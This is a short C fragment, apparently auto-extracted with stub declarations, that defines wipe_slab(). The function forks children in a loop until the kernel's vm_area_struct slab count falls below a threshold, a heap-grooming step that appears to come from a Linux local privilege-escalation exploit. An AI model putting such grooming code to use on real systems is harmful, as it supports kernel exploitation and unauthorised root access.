
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int SIGUSR1 ;
 int SIG_DFL ;
 scalar_t__ SLAB_THRSH ;
 scalar_t__ ccnt ;
 int chldcnt ;
 int cpid ;
 int do_wipe () ;
 int fflush (int ) ;
 int fork () ;
 scalar_t__ get_slab_objs (char*) ;
 int printf (char*) ;
 int signal (int ,int ) ;
 int stdout ;
 int sys_sched_yield () ;
 int val ;

void wipe_slab()
{
 signal(SIGUSR1, chldcnt);
 printf("\n[+] SLAB cleanup"); fflush(stdout);
 for(;;) {
  ccnt=0;
  val++;
  cpid = fork();
  if(!cpid)
   do_wipe();

  while(!ccnt) sys_sched_yield();
  if( get_slab_objs("vm_area_struct") <= SLAB_THRSH )
   break;
 }
 signal(SIGUSR1, SIG_DFL);
}
